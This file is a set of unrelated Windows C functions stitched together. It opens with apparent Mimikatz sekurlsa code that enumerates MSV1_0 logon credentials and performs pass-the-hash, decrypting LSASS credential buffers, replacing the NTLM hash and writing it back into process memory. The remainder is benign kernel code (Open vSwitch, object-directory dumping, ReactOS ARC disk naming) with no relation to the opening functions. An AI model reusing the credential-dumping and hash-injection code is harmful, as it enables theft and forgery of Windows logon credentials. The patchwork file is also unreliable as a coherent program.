BOOL CALLBACK kuhl_m_sekurlsa_msv_enum_cred_callback_std(IN PKIWI_MSV1_0_PRIMARY_CREDENTIALS pCredentials, IN DWORD AuthenticationPackageId, IN PKULL_M_MEMORY_ADDRESS origBufferAddress, IN OPTIONAL LPVOID pOptionalData)
{
DWORD flags = KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL;
kprintf(L"\n\t [%08x] %Z", AuthenticationPackageId, &pCredentials->Primary);
if(RtlEqualString(&pCredentials->Primary, &PRIMARY_STRING, FALSE))
flags |= KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY;
else if(RtlEqualString(&pCredentials->Primary, &CREDENTIALKEYS_STRING, FALSE))
flags |= KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY;
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) &pCredentials->Credentials, (PLUID) pOptionalData, flags, NULL, NULL);
return TRUE;
}
BOOL CALLBACK kuhl_m_sekurlsa_msv_enum_cred_callback_pth(IN PKIWI_MSV1_0_PRIMARY_CREDENTIALS pCredentials, IN DWORD AuthenticationPackageId, IN PKULL_M_MEMORY_ADDRESS origBufferAddress, IN OPTIONAL LPVOID pOptionalData)
{
PMSV1_0_PRIMARY_CREDENTIAL pPrimaryCreds = (PMSV1_0_PRIMARY_CREDENTIAL)(pCredentials->Credentials.Buffer);
PMSV1_0_PTH_DATA_CRED pthDataCred = (PMSV1_0_PTH_DATA_CRED)pOptionalData;
KULL_M_MEMORY_HANDLE hLocalMemory = { KULL_M_MEMORY_TYPE_OWN, NULL };
KULL_M_MEMORY_ADDRESS aLocalMemory = { pPrimaryCreds, &hLocalMemory };
if (RtlEqualString(&pCredentials->Primary, &PRIMARY_STRING, FALSE))
{
(*pthDataCred->pSecData->lsassLocalHelper->pLsaUnprotectMemory)(pPrimaryCreds, pCredentials->Credentials.Length);
if(pthDataCred->pthData->NtlmHash)
{
RtlCopyMemory(pPrimaryCreds->NtOwfPassword, pthDataCred->pthData->NtlmHash, LM_NTLM_HASH_LENGTH);
pPrimaryCreds->isNtOwfPassword = TRUE;
}
else
{
RtlZeroMemory(pPrimaryCreds->NtOwfPassword, LM_NTLM_HASH_LENGTH);
pPrimaryCreds->isNtOwfPassword = FALSE;
}
RtlZeroMemory(pPrimaryCreds->LmOwfPassword, LM_NTLM_HASH_LENGTH);
RtlZeroMemory(pPrimaryCreds->ShaOwPassword, SHA_DIGEST_LENGTH);
pPrimaryCreds->isLmOwfPassword = FALSE;
pPrimaryCreds->isShaOwfPassword = FALSE;
(*pthDataCred->pSecData->lsassLocalHelper->pLsaProtectMemory)(pPrimaryCreds, pCredentials->Credentials.Length);
kprintf(L"Data copy @ %p : ", origBufferAddress->address);
if (pthDataCred->pthData->isReplaceOk = kull_m_memory_copy(origBufferAddress, &aLocalMemory, pCredentials->Credentials.Length))
kprintf(L"OK !");
else PRINT_ERROR_AUTO(L"kull_m_memory_copy");
}
else kprintf(L".");
return TRUE;
}
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_msv(IN ULONG_PTR reserved, IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData)
{
KIWI_MSV1_0_CREDENTIALS credentials;
KIWI_MSV1_0_PRIMARY_CREDENTIALS primaryCredentials;
ULONG_PTR pPrimary, pCreds = (ULONG_PTR) pData->pCredentials;
DWORD flags;
while(pCreds)
{
if(ReadMemory(pCreds, &credentials, sizeof(KIWI_MSV1_0_CREDENTIALS), NULL))
{
pPrimary = (ULONG_PTR) credentials.PrimaryCredentials;
while(pPrimary)
{
if(ReadMemory(pPrimary, &primaryCredentials, sizeof(KIWI_MSV1_0_PRIMARY_CREDENTIALS), NULL))
{
if(kull_m_string_getDbgUnicodeString(&primaryCredentials.Credentials))
{
if(kull_m_string_getDbgUnicodeString((PUNICODE_STRING) &primaryCredentials.Primary))
{
dprintf("\n\t [%08x] %Z", credentials.AuthenticationPackageId, &primaryCredentials.Primary);
if(RtlEqualString(&primaryCredentials.Primary, &PRIMARY_STRING, FALSE))
flags = (NtBuildNumber < KULL_M_WIN_BUILD_10) ? KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY : KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY_10;
else if(RtlEqualString(&primaryCredentials.Primary, &CREDENTIALKEYS_STRING, FALSE))
flags = KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY;
else
flags = 0;
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) &primaryCredentials.Credentials, pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL | flags);
LocalFree(primaryCredentials.Primary.Buffer);
}
LocalFree(primaryCredentials.Credentials.Buffer);
}
} else dprintf("n.e. (Lecture KIWI_MSV1_0_PRIMARY_CREDENTIALS KO)");
pPrimary = (ULONG_PTR) primaryCredentials.next;
}
pCreds = (ULONG_PTR) credentials.next;
} else dprintf("n.e. (Lecture KIWI_MSV1_0_CREDENTIALS KO)");
}
}
BOOLEAN
OvsCompareString(PVOID string1, PVOID string2)
{
/*
* Not a super-efficient string compare since we walk over the strings
* twice: to initialize, and then to do the comparison.
*/
STRING str1, str2;
RtlInitString(&str1, string1);
RtlInitString(&str2, string2);
return RtlEqualString(&str1, &str2, FALSE);
}
VOID
DumpObjectDirs(
IN PCH DirName,
IN ULONG Level
)
{
OBJECT_ATTRIBUTES ObjectAttributes;
STRING Name;
HANDLE Handle;
ULONG Context, Length;
NTSTATUS Status;
BOOLEAN RestartScan;
POBJECT_DIRECTORY_INFORMATION DirInfo;
CHAR DirInfoBuffer[ 256 ];
CHAR SubDirName[ 128 ];
STRING LinkName;
STRING LinkTarget;
HANDLE LinkHandle;
RtlInitString( &Name, DirName );
InitializeObjectAttributes( &ObjectAttributes,
&Name,
OBJ_OPENIF | OBJ_CASE_INSENSITIVE,
NULL,
NULL
);
NtCreateDirectoryObject( &Handle,
DIRECTORY_ALL_ACCESS,
&ObjectAttributes
);
DirInfo = (POBJECT_DIRECTORY_INFORMATION)&DirInfoBuffer;
RestartScan = TRUE;
while (TRUE) {
Status = NtQueryDirectoryObject( Handle,
(PVOID)DirInfo,
sizeof( DirInfoBuffer ),
TRUE,
RestartScan,
&Context,
&Length
);
if (!NT_SUCCESS( Status )) {
break;
}
DbgPrint( "%s%s%Z - %Z",
DirName,
Level ? "\\" : "",
&DirInfo->Name,
&DirInfo->TypeName
);
if (RtlEqualString( &DirInfo->TypeName, &DirTypeName, TRUE )) {
DbgPrint( "\n" );
strcpy( SubDirName, DirName );
if (Level) {
strcat( SubDirName, "\\" );
}
strcat( SubDirName, DirInfo->Name.Buffer );
DumpObjectDirs( SubDirName, Level+1 );
}
else
if (RtlEqualString( &DirInfo->TypeName, &LinkTypeName, TRUE )) {
strcpy( SubDirName, DirName );
if (Level) {
strcat( SubDirName, "\\" );
}
strcat( SubDirName, DirInfo->Name.Buffer );
RtlInitString( &LinkName, SubDirName );
InitializeObjectAttributes( &ObjectAttributes,
&LinkName,
0,
NULL,
NULL
);
Status = NtOpenSymbolicLinkObject( &LinkHandle,
SYMBOLIC_LINK_ALL_ACCESS,
&ObjectAttributes
);
if (!NT_SUCCESS( Status )) {
DbgPrint( " - unable to open symbolic link (%X)\n", Status );
}
else {
LinkTarget.MaximumLength = sizeof( SubDirName );
LinkTarget.Length = 0;
LinkTarget.Buffer = SubDirName;
Status = NtQuerySymbolicLinkObject( LinkHandle,
&LinkTarget
);
if (!NT_SUCCESS( Status )) {
DbgPrint( " - unable to query symbolic link target (%X)\n", Status );
}
else {
DbgPrint( " => %Z\n", &LinkTarget );
}
NtClose( LinkHandle );
}
}
else {
DbgPrint( "\n" );
}
RestartScan = FALSE;
}
NtClose( Handle );
}
NTSTATUS
INIT_FUNCTION
NTAPI
IopCreateArcNamesDisk(IN PLOADER_PARAMETER_BLOCK LoaderBlock,
IN BOOLEAN SingleDisk,
IN PBOOLEAN FoundBoot)
{
PIRP Irp;
PVOID Data;
KEVENT Event;
NTSTATUS Status;
PLIST_ENTRY NextEntry;
PFILE_OBJECT FileObject;
DISK_GEOMETRY DiskGeometry;
PDEVICE_OBJECT DeviceObject;
LARGE_INTEGER StartingOffset;
PULONG PartitionBuffer = NULL;
IO_STATUS_BLOCK IoStatusBlock;
CHAR Buffer[128], ArcBuffer[128];
BOOLEAN NotEnabledPresent = FALSE;
STORAGE_DEVICE_NUMBER DeviceNumber;
PARC_DISK_SIGNATURE ArcDiskSignature;
PWSTR SymbolicLinkList, lSymbolicLinkList;
PDRIVE_LAYOUT_INFORMATION_EX DriveLayout = NULL;
UNICODE_STRING DeviceStringW, ArcNameStringW, HalPathStringW;
ULONG DiskNumber, DiskCount, CheckSum, i, Signature, EnabledDisks = 0;
PARC_DISK_INFORMATION ArcDiskInformation = LoaderBlock->ArcDiskInformation;
ANSI_STRING ArcBootString, ArcSystemString, DeviceStringA, ArcNameStringA, HalPathStringA;
/* Initialise device number */
DeviceNumber.DeviceNumber = 0xFFFFFFFF;
/* Get all the disks present in the system */
DiskCount = IoGetConfigurationInformation()->DiskCount;
/* Get enabled disks and check if result matches */
Status = IopFetchConfigurationInformation(&SymbolicLinkList,
GUID_DEVINTERFACE_DISK,
DiskCount,
&EnabledDisks);
if (!NT_SUCCESS(Status))
{
NotEnabledPresent = TRUE;
}
/* Save symbolic link list address in order to free it after */
lSymbolicLinkList = SymbolicLinkList;
/* Build the boot strings */
RtlInitAnsiString(&ArcBootString, LoaderBlock->ArcBootDeviceName);
RtlInitAnsiString(&ArcSystemString, LoaderBlock->ArcHalDeviceName);
/* If we have more enabled disks, take that into account */
if (EnabledDisks > DiskCount)
{
DiskCount = EnabledDisks;
}
/* If we'll have to browse for none enabled disks, fix higher count */
if (NotEnabledPresent && !EnabledDisks)
{
DiskCount += 20;
}
/* Finally, if in spite of all that work, we still don't have disks, leave */
if (!DiskCount)
{
goto Cleanup;
}
/* Start browsing disks */
for (DiskNumber = 0; DiskNumber < DiskCount; DiskNumber++)
{
/* Check if we have an enabled disk */
if (lSymbolicLinkList && *lSymbolicLinkList != UNICODE_NULL)
{
/* Create its device name using first symbolic link */
RtlInitUnicodeString(&DeviceStringW, lSymbolicLinkList);
/* Then, update symbolic links list */
lSymbolicLinkList += wcslen(lSymbolicLinkList) + (sizeof(UNICODE_NULL) / sizeof(WCHAR));
/* Get its associated device object and file object */
Status = IoGetDeviceObjectPointer(&DeviceStringW,
FILE_READ_ATTRIBUTES,
&FileObject,
&DeviceObject);
if (NT_SUCCESS(Status))
{
/* Now, we'll ask the device its device number */
Irp = IoBuildDeviceIoControlRequest(IOCTL_STORAGE_GET_DEVICE_NUMBER,
DeviceObject,
NULL,
0,
&DeviceNumber,
sizeof(STORAGE_DEVICE_NUMBER),
FALSE,
&Event,
&IoStatusBlock);
/* Missing resources is a shame... No need to go farther */
if (!Irp)
{
ObDereferenceObject(FileObject);
Status = STATUS_INSUFFICIENT_RESOURCES;
goto Cleanup;
}
/* Call the driver, and wait for it if needed */
KeInitializeEvent(&Event, NotificationEvent, FALSE);
Status = IoCallDriver(DeviceObject, Irp);
if (Status == STATUS_PENDING)
{
KeWaitForSingleObject(&Event, Executive, KernelMode, FALSE, NULL);
Status = IoStatusBlock.Status;
}
/* If we didn't get the appriopriate data, just skip that disk */
if (!NT_SUCCESS(Status))
{
ObDereferenceObject(FileObject);
continue;
}
}
/* End of enabled disks enumeration */
if (NotEnabledPresent && *lSymbolicLinkList == UNICODE_NULL)
{
/* No enabled disk worked, reset field */
if (DeviceNumber.DeviceNumber == 0xFFFFFFFF)
{
DeviceNumber.DeviceNumber = 0;
}
/* Update disk number to enable the following not enabled disks */
if (DeviceNumber.DeviceNumber > DiskNumber)
{
DiskNumber = DeviceNumber.DeviceNumber;
}
/* Increase a bit more */
DiskCount = DiskNumber + 20;
}
}
else
{
/* Create device name for the disk */
sprintf(Buffer, "\\Device\\Harddisk%lu\\Partition0", DiskNumber);
RtlInitAnsiString(&DeviceStringA, Buffer);
Status = RtlAnsiStringToUnicodeString(&DeviceStringW, &DeviceStringA, TRUE);
if (!NT_SUCCESS(Status))
{
goto Cleanup;
}
/* Get its device object */
Status = IoGetDeviceObjectPointer(&DeviceStringW,
FILE_READ_ATTRIBUTES,
&FileObject,
&DeviceObject);
RtlFreeUnicodeString(&DeviceStringW);
/* This is a security measure, to ensure DiskNumber will be used */
DeviceNumber.DeviceNumber = 0xFFFFFFFF;
}
/* Something failed somewhere earlier, just skip the disk */
if (!NT_SUCCESS(Status))
{
continue;
}
/* Let's ask the disk for its geometry */
Irp = IoBuildDeviceIoControlRequest(IOCTL_DISK_GET_DRIVE_GEOMETRY,
DeviceObject,
NULL,
0,
&DiskGeometry,
sizeof(DISK_GEOMETRY),
FALSE,
&Event,
&IoStatusBlock);
/* Missing resources is a shame... No need to go farther */
if (!Irp)
{
ObDereferenceObject(FileObject);
Status = STATUS_INSUFFICIENT_RESOURCES;
goto Cleanup;
}
/* Call the driver, and wait for it if needed */
KeInitializeEvent(&Event, NotificationEvent, FALSE);
Status = IoCallDriver(DeviceObject, Irp);
if (Status == STATUS_PENDING)
{
KeWaitForSingleObject(&Event, Executive, KernelMode, FALSE, NULL);
Status = IoStatusBlock.Status;
}
/* Failure, skip disk */
if (!NT_SUCCESS(Status))
{
ObDereferenceObject(FileObject);
continue;
}
/* Read the partition table */
Status = IoReadPartitionTableEx(DeviceObject,
&DriveLayout);
if (!NT_SUCCESS(Status))
{
ObDereferenceObject(FileObject);
continue;
}
/* Ensure we have at least 512 bytes per sector */
if (DiskGeometry.BytesPerSector < 512)
{
DiskGeometry.BytesPerSector = 512;
}
/* Check MBR type against EZ Drive type */
StartingOffset.QuadPart = 0;
HalExamineMBR(DeviceObject, DiskGeometry.BytesPerSector, 0x55, &Data);
if (Data)
{
/* If MBR is of the EZ Drive type, we'll read after it */
StartingOffset.QuadPart = DiskGeometry.BytesPerSector;
ExFreePool(Data);
}
/* Allocate for reading enough data for checksum */
PartitionBuffer = ExAllocatePoolWithTag(NonPagedPoolCacheAligned, DiskGeometry.BytesPerSector, TAG_IO);
if (!PartitionBuffer)
{
ObDereferenceObject(FileObject);
Status = STATUS_INSUFFICIENT_RESOURCES;
goto Cleanup;
}
/* Read a sector for computing checksum */
Irp = IoBuildSynchronousFsdRequest(IRP_MJ_READ,
DeviceObject,
PartitionBuffer,
DiskGeometry.BytesPerSector,
&StartingOffset,
&Event,
&IoStatusBlock);
if (!Irp)
{
ObDereferenceObject(FileObject);
Status = STATUS_INSUFFICIENT_RESOURCES;
goto Cleanup;
}
/* Call the driver to perform reading */
KeInitializeEvent(&Event, NotificationEvent, FALSE);
Status = IoCallDriver(DeviceObject, Irp);
if (Status == STATUS_PENDING)
{
KeWaitForSingleObject(&Event, Executive, KernelMode, FALSE, NULL);
Status = IoStatusBlock.Status;
}
if (!NT_SUCCESS(Status))
{
ExFreePool(DriveLayout);
ExFreePoolWithTag(PartitionBuffer, TAG_IO);
ObDereferenceObject(FileObject);
continue;
}
ObDereferenceObject(FileObject);
/* Calculate checksum, that's an easy computation, just adds read data */
for (i = 0, CheckSum = 0; i < 512 / sizeof(ULONG) ; i++)
{
CheckSum += PartitionBuffer[i];
}
/* Browse each ARC disk */
for (NextEntry = ArcDiskInformation->DiskSignatureListHead.Flink;
NextEntry != &ArcDiskInformation->DiskSignatureListHead;
NextEntry = NextEntry->Flink)
{
ArcDiskSignature = CONTAINING_RECORD(NextEntry,
ARC_DISK_SIGNATURE,
ListEntry);
/* If they matches, ie
* - There's only one disk for both BIOS and detected/enabled
* - Signatures are matching
* - Checksums are matching
* - This is MBR
*/
if (((SingleDisk && DiskCount == 1) ||
(IopVerifyDiskSignature(DriveLayout, ArcDiskSignature, &Signature) &&
(ArcDiskSignature->CheckSum + CheckSum == 0))) &&
(DriveLayout->PartitionStyle == PARTITION_STYLE_MBR))
{
/* Create device name */
sprintf(Buffer, "\\Device\\Harddisk%lu\\Partition0", (DeviceNumber.DeviceNumber != 0xFFFFFFFF) ? DeviceNumber.DeviceNumber : DiskNumber);
RtlInitAnsiString(&DeviceStringA, Buffer);
Status = RtlAnsiStringToUnicodeString(&DeviceStringW, &DeviceStringA, TRUE);
if (!NT_SUCCESS(Status))
{
goto Cleanup;
}
/* Create ARC name */
sprintf(ArcBuffer, "\\ArcName\\%s", ArcDiskSignature->ArcName);
RtlInitAnsiString(&ArcNameStringA, ArcBuffer);
Status = RtlAnsiStringToUnicodeString(&ArcNameStringW, &ArcNameStringA, TRUE);
if (!NT_SUCCESS(Status))
{
RtlFreeUnicodeString(&DeviceStringW);
goto Cleanup;
}
/* Link both */
IoCreateSymbolicLink(&ArcNameStringW, &DeviceStringW);
/* And release resources */
RtlFreeUnicodeString(&ArcNameStringW);
RtlFreeUnicodeString(&DeviceStringW);
/* Now, browse for every partition */
for (i = 1; i <= DriveLayout->PartitionCount; i++)
{
/* Create device name */
sprintf(Buffer, "\\Device\\Harddisk%lu\\Partition%lu", (DeviceNumber.DeviceNumber != 0xFFFFFFFF) ? DeviceNumber.DeviceNumber : DiskNumber, i);
RtlInitAnsiString(&DeviceStringA, Buffer);
Status = RtlAnsiStringToUnicodeString(&DeviceStringW, &DeviceStringA, TRUE);
if (!NT_SUCCESS(Status))
{
goto Cleanup;
}
/* Create partial ARC name */
sprintf(ArcBuffer, "%spartition(%lu)", ArcDiskSignature->ArcName, i);
RtlInitAnsiString(&ArcNameStringA, ArcBuffer);
/* Is that boot device? */
if (RtlEqualString(&ArcNameStringA, &ArcBootString, TRUE))
{
DPRINT("Found boot device\n");
*FoundBoot = TRUE;
}
/* Is that system partition? */
if (RtlEqualString(&ArcNameStringA, &ArcSystemString, TRUE))
{
/* Create HAL path name */
RtlInitAnsiString(&HalPathStringA, LoaderBlock->NtHalPathName);
Status = RtlAnsiStringToUnicodeString(&HalPathStringW, &HalPathStringA, TRUE);
if (!NT_SUCCESS(Status))
{
RtlFreeUnicodeString(&DeviceStringW);
goto Cleanup;
}
/* Then store those information to registry */
IopStoreSystemPartitionInformation(&DeviceStringW, &HalPathStringW);
RtlFreeUnicodeString(&HalPathStringW);
}
/* Create complete ARC name */
sprintf(ArcBuffer, "\\ArcName\\%spartition(%lu)", ArcDiskSignature->ArcName, i);
RtlInitAnsiString(&ArcNameStringA, ArcBuffer);
Status = RtlAnsiStringToUnicodeString(&ArcNameStringW, &ArcNameStringA, TRUE);
if (!NT_SUCCESS(Status))
{
RtlFreeUnicodeString(&DeviceStringW);
goto Cleanup;
}
/* Link device name & ARC name */
IoCreateSymbolicLink(&ArcNameStringW, &DeviceStringW);
/* Release strings */
RtlFreeUnicodeString(&ArcNameStringW);
RtlFreeUnicodeString(&DeviceStringW);
}
}
else
{
/* In case there's a valid partition, a matching signature,
BUT a none matching checksum, or there's a duplicate
signature, or even worse a virus played with partition
table */
if (ArcDiskSignature->Signature == Signature &&
(ArcDiskSignature->CheckSum + CheckSum != 0) &&
ArcDiskSignature->ValidPartitionTable)
{
DPRINT("Be careful, or you have a duplicate disk signature, or a virus altered your MBR!\n");
}
}
}
/* Release memory before jumping to next item */
ExFreePool(DriveLayout);
DriveLayout = NULL;
ExFreePoolWithTag(PartitionBuffer, TAG_IO);
PartitionBuffer = NULL;
}
Status = STATUS_SUCCESS;
Cleanup:
if (SymbolicLinkList)
{
ExFreePool(SymbolicLinkList);
}
if (DriveLayout)
{
ExFreePool(DriveLayout);
}
if (PartitionBuffer)
{
ExFreePoolWithTag(PartitionBuffer, TAG_IO);
}
return Status;
}
